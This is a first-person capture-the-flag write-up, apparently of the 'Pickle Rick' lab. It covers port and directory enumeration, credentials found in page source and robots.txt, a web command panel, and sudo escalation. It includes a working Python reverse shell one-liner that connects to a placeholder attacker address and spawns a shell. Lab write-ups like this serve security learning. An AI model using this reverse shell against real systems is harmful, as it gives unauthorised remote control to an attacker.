Enumeration
First I used nmap to find what services/ports were open on the IP address
Here we find that port 22 and 80 are open
I then start an aggressive scan on the system to get more information
We get the OS (Ubuntu) and web server version(Apache/2.4.18) from this scan.
After scanning the ports/services of the system, we then try to find directories in the web server with dirsearch
Here we can see the directories of the web server.
Alright let’s now visit the site on a browser and try to get more info
There is not really much information at first glance but we see that we require a password to logon onto Rick’s account
I then look at the source code (right click+view source code/inspect element) and find the username only R1ckRul3s (sad)
Let’s further enumerate into the web server by checking /assets/
Luckily it has indexing on and we are able to see the files in the /assets/
Not really much info here so lets head on to /robots.txt/
Google search reveals that it is Rick’s catchphrase
(Sorry I don’t watch rick & morty)
Could it be the password?
Let’s head on to login.php and try logging in with R1ckRul3s
as the username and Wubbalubbadubdub as the password
It works!
It seems like we can execute commands in this panel
Let’s try to list the contents of this directory /var/www/html
We got one ingredient! And a clue! YAY
Let’s output the file
It doesn’t work…
Let’s try to get a reverse shell instead
Exploitation
With this link as my source, I decided to try a bash reverse shell
Well, that didn’t work, so I tried a python reverse shell instead
(Make sure to change the “python” to “python3” at the start of your command)
python3 -c ‘import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“IP_Address”,4343));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(“/bin/sh”)’
It worked!
We successfully found the first ingredient!
Let’s look at the clue (clue.txt) to get information on where the next ingredient is.
I decided to look at rick’s home directory as he had one
And we found it!
Now for the last ingredient
There are some directories we cannot visit such as /root due to our permissions
(I totally forgot about sudo and had to seek help lol)
Lets try to view /root with sudo
Let’s open the 3rd ingredient
And we are finally done!
From this challenge, I have learnt
How important enumeration is
How to use dirsearch
More on reverse shells
How important sudo is